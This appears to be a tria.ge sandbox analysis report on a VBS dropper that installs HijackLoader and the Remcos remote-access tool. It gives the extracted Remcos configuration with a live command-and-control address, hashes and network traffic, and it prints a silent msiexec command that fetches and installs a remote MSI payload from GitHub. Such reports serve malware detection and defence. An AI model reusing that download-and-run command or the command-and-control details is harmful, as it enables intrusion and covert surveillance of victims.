Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

secondaryTask.vbs

windows7-x64

7

secondaryTask.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/01/2025, 20:07 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    secondaryTask.vbs

  • Size

    512B

  • MD5

    bcc1d6a3c9aeec994cd31f86ada37ae6

  • SHA1

    0b7bb7af96d842cfbb7a89793a4292fec4289a8c

  • SHA256

    41590f3a8ba3c910f11fd5fa095856d5bc556f20fa4fd6d269aa1be4e08b4c64

  • SHA512

    8793e62dc4a9465ef5254e15b3471573a242705dfdf74bd3d09d97c10dd84daf69aa8c0b5c9bc3c5a7302e431fc2ed417b1e6c194da106765e50ad385ea955b7

Score
10/10
hijackloaderremcosv2discoveryloaderrat

Malware Config

Extracted

Family

remcos

Botnet

v2

C2

185.157.162.126:1995

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    qsdazeazd-EL00KX

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Detects HijackLoader (aka IDAT Loader) 1 IoCs
  • HijackLoader

    HijackLoader is a multistage loader first seen in 2023.

    loaderhijackloader
  • Hijackloader family
    hijackloader
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 7 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 8 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\secondaryTask.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1524
    • C:\Windows\System32\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi" /qn
      2⤵
      • Use of msiexec (install) with remote resource
      • Enumerates connected drives
      • Suspicious use of AdjustPrivilegeToken
      PID:4388
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2712
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 06E6160C25342A676FC4AA7A4DADC80C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:4476
    • C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe
      "C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:4136
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\SysWOW64\cmd.exe
        3⤵
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:5116
        • C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe
          "C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe"
          4⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:432

Network

  • flag-us
    DNS
    github.com
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    github.com
    IN A
    Response
    github.com
    IN A
    20.26.156.215
  • flag-gb
    GET
    https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi
    msiexec.exe
    Remote address:
    20.26.156.215:443
    Request
    GET /Kroby5444/Jim/raw/refs/heads/main/Slf.msi HTTP/2.0
    host: github.com
    accept: */*
    user-agent: Windows Installer
    Response
    HTTP/2.0 302
    server: GitHub.com
    date: Thu, 30 Jan 2025 20:07:07 GMT
    content-type: text/html; charset=utf-8
    vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    access-control-allow-origin:
    location: https://raw.githubusercontent.com/Kroby5444/Jim/refs/heads/main/Slf.msi
    cache-control: no-cache
    strict-transport-security: max-age=31536000; includeSubdomains; preload
    x-frame-options: deny
    x-content-type-options: nosniff
    x-xss-protection: 0
    referrer-policy: no-referrer-when-downgrade
    content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
    content-length: 0
    x-github-request-id: FB8C:25D712:5DED1:764C9:679BDBF0
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    raw.githubusercontent.com
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    raw.githubusercontent.com
    IN A
    Response
    raw.githubusercontent.com
    IN A
    185.199.108.133
    raw.githubusercontent.com
    IN A
    185.199.111.133
    raw.githubusercontent.com
    IN A
    185.199.109.133
    raw.githubusercontent.com
    IN A
    185.199.110.133
  • flag-us
    GET
    https://raw.githubusercontent.com/Kroby5444/Jim/refs/heads/main/Slf.msi
    msiexec.exe
    Remote address:
    185.199.108.133:443
    Request
    GET /Kroby5444/Jim/refs/heads/main/Slf.msi HTTP/2.0
    host: raw.githubusercontent.com
    accept: */*
    user-agent: Windows Installer
    Response
    HTTP/2.0 200
    cache-control: max-age=300
    content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    content-type: application/octet-stream
    etag: "15069df03d703864669c54ef87b4b9e9ce3bc9be8473953fff33c706eb25c2a6"
    strict-transport-security: max-age=31536000
    x-content-type-options: nosniff
    x-frame-options: deny
    x-xss-protection: 1; mode=block
    x-github-request-id: 6922:2450AD:B049:E320:679BD92F
    accept-ranges: bytes
    date: Thu, 30 Jan 2025 20:07:13 GMT
    via: 1.1 varnish
    x-served-by: cache-lcy-eglc8600034-LCY
    x-cache: HIT
    x-cache-hits: 0
    x-timer: S1738267633.227390,VS0,VE80
    vary: Authorization,Accept-Encoding,Origin
    access-control-allow-origin: *
    cross-origin-resource-policy: cross-origin
    x-fastly-request-id: 3086e3e7d73d18d16c940bde9e2313d9c9209a7c
    expires: Thu, 30 Jan 2025 20:12:13 GMT
    source-age: 0
    content-length: 4502528
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.ax-0001.ax-msedge.net
    g-bing-com.ax-0001.ax-msedge.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=308BFE8CEBD069C93E15EB08EA4F68D1; domain=.bing.com; expires=Tue, 24-Feb-2026 20:07:13 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 26B6CEAE85484139B9315A18C42277AD Ref B: LON601060103052 Ref C: 2025-01-30T20:07:13Z
    date: Thu, 30 Jan 2025 20:07:13 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=308BFE8CEBD069C93E15EB08EA4F68D1
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=eqY_vqmslE3OURdyCGLPj_ygsfad2NdFGwfg29CoFU4; domain=.bing.com; expires=Tue, 24-Feb-2026 20:07:14 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: AE8A5A1A37ED4DE7A084E52B9FC6A1C5 Ref B: LON601060103052 Ref C: 2025-01-30T20:07:14Z
    date: Thu, 30 Jan 2025 20:07:13 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=308BFE8CEBD069C93E15EB08EA4F68D1; MSPTC=eqY_vqmslE3OURdyCGLPj_ygsfad2NdFGwfg29CoFU4
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 16AB399D154F483E96731721CB0CF9D2 Ref B: LON601060103052 Ref C: 2025-01-30T20:07:14Z
    date: Thu, 30 Jan 2025 20:07:13 GMT
  • flag-us
    DNS
    215.156.26.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    215.156.26.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    72.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    72.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    133.108.199.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.108.199.185.in-addr.arpa
    IN PTR
    Response
    133.108.199.185.in-addr.arpa
    IN PTR
    cdn-185-199-108-133githubcom
  • flag-us
    DNS
    133.130.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.130.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    5.114.82.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    5.114.82.104.in-addr.arpa
    IN PTR
    Response
    5.114.82.104.in-addr.arpa
    IN PTR
    a104-82-114-5deploystaticakamaitechnologiescom
  • flag-us
    DNS
    43.58.199.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.58.199.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.31.95.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.31.95.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    212.20.149.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    212.20.149.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    126.162.157.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    126.162.157.185.in-addr.arpa
    IN PTR
    Response
    126.162.157.185.in-addr.arpa
    IN PTR
    185-157-162-126poolovpncom
  • flag-us
    DNS
    13.153.16.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.153.16.2.in-addr.arpa
    IN PTR
    Response
    13.153.16.2.in-addr.arpa
    IN PTR
    a2-16-153-13deploystaticakamaitechnologiescom
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.236.111.52.in-addr.arpa
    IN PTR
    Response
  • 20.26.156.215:443
    https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi
    tls, http2
    msiexec.exe
    1.1kB
     7.8kB
     14
    12

    HTTP Request

    GET https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi

    HTTP Response

    302
  • 185.199.108.133:443
    https://raw.githubusercontent.com/Kroby5444/Jim/refs/heads/main/Slf.msi
    tls, http2
    msiexec.exe
    137.4kB
     4.7MB
     2608
    3355

    HTTP Request

    GET https://raw.githubusercontent.com/Kroby5444/Jim/refs/heads/main/Slf.msi

    HTTP Response

    200
  • 150.171.27.10:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid=
    tls, http2
    2.0kB
     9.3kB
     22
    18

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=db4f4f043a6942a3a1fdab65b84b97a4&localId=w:29A35C3D-9BC5-AEFB-2396-56CCD722C64D&deviceId=6755477840987139&anid=

    HTTP Response

    204
  • 185.157.162.126:1995
    tls
    EHttpSrv.exe
    2.2kB
     1.4kB
     11
    14
  • 8.8.8.8:53
    github.com
    dns
    msiexec.exe
    56 B
     72 B
     1
    1

    DNS Request

    github.com

    DNS Response

    20.26.156.215

  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
     90 B
     1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    raw.githubusercontent.com
    dns
    msiexec.exe
    71 B
     135 B
     1
    1

    DNS Request

    raw.githubusercontent.com

    DNS Response

    185.199.108.133
    185.199.111.133
    185.199.109.133
    185.199.110.133

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
     148 B
     1
    1

    DNS Request

    g.bing.com

    DNS Response

    150.171.27.10
    150.171.28.10

  • 8.8.8.8:53
    215.156.26.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    215.156.26.20.in-addr.arpa

  • 8.8.8.8:53
    72.32.126.40.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    72.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    133.108.199.185.in-addr.arpa
    dns
    74 B
     118 B
     1
    1

    DNS Request

    133.108.199.185.in-addr.arpa

  • 8.8.8.8:53
    133.130.81.91.in-addr.arpa
    dns
    72 B
     147 B
     1
    1

    DNS Request

    133.130.81.91.in-addr.arpa

  • 8.8.8.8:53
    5.114.82.104.in-addr.arpa
    dns
    71 B
     135 B
     1
    1

    DNS Request

    5.114.82.104.in-addr.arpa

  • 8.8.8.8:53
    43.58.199.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    43.58.199.20.in-addr.arpa

  • 8.8.8.8:53
    18.31.95.13.in-addr.arpa
    dns
    70 B
     144 B
     1
    1

    DNS Request

    18.31.95.13.in-addr.arpa

  • 8.8.8.8:53
    212.20.149.52.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    212.20.149.52.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
     128 B
     1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    126.162.157.185.in-addr.arpa
    dns
    74 B
     117 B
     1
    1

    DNS Request

    126.162.157.185.in-addr.arpa

  • 8.8.8.8:53
    13.153.16.2.in-addr.arpa
    dns
    70 B
     133 B
     1
    1

    DNS Request

    13.153.16.2.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
     128 B
     1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    22.236.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    22.236.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Config.Msi\e57b325.rbs
    Filesize

    2KB

    MD5

    d2a4749ed59fbd8df57f25080dad16c4

    SHA1

    3629dc902832dc2b5eae9f410e28df6f89e07248

    SHA256

    d1eaf452b9c206137719c7834cadec3d4213af648d68f2194601608899a919ce

    SHA512

    018698c197e266c4b604fe28278067f4fcb2303b9644c7fd92c694d695888da871c3038e96c92a546d5acb3eb18bca214373cb79748f85ae49576c3ede56fe3e

    Download Submit

  • C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe
    Filesize

    20KB

    MD5

    9329ba45c8b97485926a171e34c2abb8

    SHA1

    20118bc0432b4e8b3660a4b038b20ca28f721e5c

    SHA256

    effa6fcb8759375b4089ccf61202a5c63243f4102872e64e3eb0a1bdc2727659

    SHA512

    0af06b5495142ba0632a46be0778a7bd3d507e9848b3159436aa504536919abbcacd8b740ef4b591296e86604b49e0642fee2c273a45e44b41a80f91a1d52acc

    Download Submit

  • C:\Program Files (x86)\Common Files\PackagerUpdt\MFC80U.DLL
    Filesize

    1.0MB

    MD5

    686b224b4987c22b153fbb545fee9657

    SHA1

    684ee9f018fbb0bbf6ffa590f3782ba49d5d096c

    SHA256

    a2ac851f35066c2f13a7452b7a9a3fee05bfb42907ae77a6b85b212a2227fc36

    SHA512

    44d65db91ceea351d2b6217eaa27358dbc2ed27c9a83d226b59aecb336a9252b60aec5ce5e646706a2af5631d5ee0f721231ec751e97e47bbbc32d5f40908875

    Download Submit

  • C:\Program Files (x86)\Common Files\PackagerUpdt\audiogram.tif
    Filesize

    877KB

    MD5

    5124236fd955464317fbb1f344a1d2f2

    SHA1

    fe3a91e252f1dc3c3b4980ade7157369ea6f5097

    SHA256

    ed1389002cdf96c9b54de35b6e972166ee3296d628943fd594a383e674c5cba6

    SHA512

    2b2ac23244b16f936ef9a4049586f58c809fcc4391a56390cc5db2e8d96140001e0b977680ed1d8b0ab9c410e865a880209e22add8d42e563dc40bc91236b252

    Download Submit

  • C:\Program Files (x86)\Common Files\PackagerUpdt\http_dll.dll
    Filesize

    2.3MB

    MD5

    1e2a640f1a98da16fc61c865cec7d54e

    SHA1

    178563fab7b06e99551f66ba090d0911205a2fe4

    SHA256

    e296a18272a7bde471f37e51d49e6febe944ed4e78a2d5e79f1b2ee3330fb10f

    SHA512

    2426b1ce2bd01af6f34c56e1ef0290e521566ae1196a15aeb594bcf33793aa405ce01b4196bfe48de33320bab7a570a55110995025c54edcf790c2d10166fa9c

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\4407b7c1
    Filesize

    1.0MB

    MD5

    0e530ad32eae61b8f5dc032ece4d89a5

    SHA1

    f4afc1228c44112bc707461070f384370dd123be

    SHA256

    143db7d24da0f3d7c9ce440a50f49f78b3a65ee54066cb24cfb13bf6198bc622

    SHA512

    6674eeb2576b135dc19aaa454e8cfed43bf57d3dfb96a27c83d9f7ec5b12cefb114391956ff9fefd19843ad7cefc0d5764dcea294b29f871a41d3aa0fef9a7a0

    Download Submit

  • C:\Windows\Installer\MSIAD57.tmp
    Filesize

    4.3MB

    MD5

    8e31046891c36ca794fb01262cd890d9

    SHA1

    7f812da89f328e871290be32bdead1fc869377d6

    SHA256

    d03d7ea5956a5d9ca6c1b1af800350b6ef400815b452f69a886f4156ba1a3ec5

    SHA512

    95c4c8f0196a8e373913fc41eb44c70fa8abbea38324993aa42ca05be5d6229430a4e2a4671a914a4f00986b75845c247a91809aae994ff835aa56614606840d

    Download Submit

  • C:\Windows\Installer\MSIB0F2.tmp
    Filesize

    557KB

    MD5

    2c9c51ac508570303c6d46c0571ea3a1

    SHA1

    e3e0fe08fa11a43c8bca533f212bdf0704c726d5

    SHA256

    ff86c76a8d5846b3a1ad58ff2fd8e5a06a84eb5899cdee98e59c548d33335550

    SHA512

    df5f1def5aac44f39a2dfde9c6c73f15f83a7374b4ad42b67e425ccb7ac99a64c5701b676ae46d2f7167a04a955158031a839e7878d100aaf8fab0ce2059f127

    Download Submit

  • memory/432-67-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

    Download

  • memory/432-71-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

    Download

  • memory/432-78-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

    Download

  • memory/432-77-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

    Download

  • memory/432-61-0x0000000072A60000-0x0000000073CB4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/432-63-0x00007FFD7A9F0000-0x00007FFD7ABE5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/432-64-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

    Download

  • memory/432-76-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

    Download

  • memory/432-68-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

    Download

  • memory/432-70-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

    Download

  • memory/432-75-0x0000000000410000-0x0000000000494000-memory.dmp

    Filesize

    528KB

    Download

  • memory/4136-51-0x0000000073EA0000-0x000000007401B000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/4136-50-0x0000000073EA0000-0x000000007401B000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/5116-59-0x0000000073EA0000-0x000000007401B000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/5116-57-0x00007FFD7A9F0000-0x00007FFD7ABE5000-memory.dmp

    Filesize

    2.0MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.